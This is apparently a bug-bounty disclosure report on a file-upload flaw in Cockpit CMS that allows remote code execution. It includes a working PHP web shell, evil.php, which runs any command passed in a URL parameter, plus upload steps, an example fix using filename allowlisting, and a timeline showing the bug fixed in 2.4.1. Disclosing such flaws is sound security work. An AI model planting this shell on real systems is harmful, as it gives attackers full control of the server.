File Upload Bypass Leads to Remote Code Execution (RCE) in cockpit-hq/cockpit

Valid

Reported on

Mar 9th 2023


Description

There are no extension checks during file upload. An attacker may upload a file to execute malicious code on the server.

Proof of Concept

Step 1: Create a file with the content below and save it as evil.php

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
</html>

Step 2: Login to the Cockpit web server

Step 3: Go to assets

Step 4: Upload Assets

Step 5: Upload the file that was created.

Step 6: Copy the asset link and paste it into a new tab.

Step 7: Able to execute any commands.

Impact

Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.

I am able to gain access to the whole compromised machine.
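
One way to enforce the extension check that the Description says is missing, shown as an added example that is not Cockpit's code and not the fix shipped in 2.4.1. The function name `safeUploadName` and the allowlist are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Added example, not Cockpit's code. The allowlist is an assumption:
// restrict it to the asset types the deployment actually needs.
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'webp', 'pdf', 'txt'];

/**
 * Returns the name to store an upload under, or null to reject it.
 * $clientName is the browser-supplied name, e.g. $_FILES['file']['name'].
 */
function safeUploadName(string $clientName): ?string
{
    // Reject control bytes (including NUL) before any path handling.
    if (preg_match('/[\x00-\x1f]/', $clientName)) {
        return null;
    }
    // Drop any directory component, whichever separator was used.
    $name = basename(str_replace('\\', '/', $clientName));

    // Some filesystems strip trailing dots and spaces ("evil.php.").
    $name = rtrim($name, '. ');

    $parts = explode('.', strtolower($name));
    if (count($parts) < 2 || $parts[0] === '') {
        return null; // no extension, or a dotfile such as .htaccess
    }

    // Only the final extension is kept, and only if it is allowlisted.
    $ext = array_pop($parts);
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return null;
    }

    // Store under a random name so the client never controls the path
    // or any inner extension ("evil.php.jpg" becomes "<random>.jpg").
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample names, including the evil.php from the report.
$samples = ['photo.JPG', 'evil.php', 'evil.php.jpg', 'evil.php.', '.htaccess', '../x.phtml'];
foreach ($samples as $n) {
    printf("%-14s => %s\n", $n, safeUploadName($n) ?? 'rejected');
}
```

A name check of this kind only covers the filename. Serving the upload directory with script execution disabled covers the case where a file with an allowed extension still contains PHP.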

We are processing your report and will contact the cockpit-hq/cockpit team within 24 hours. (22 days ago)
We have contacted a member of the cockpit-hq/cockpit team and are waiting to hear back. (21 days ago)
Artur validated this vulnerability. (21 days ago)
choocs has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Artur marked this as fixed in 2.4.1 with commit becca8. (21 days ago)
Artur has been awarded the fix bounty
This vulnerability has been assigned a CVE
Artur published this vulnerability. (21 days ago)
Assets.php#L129-L180 has been validated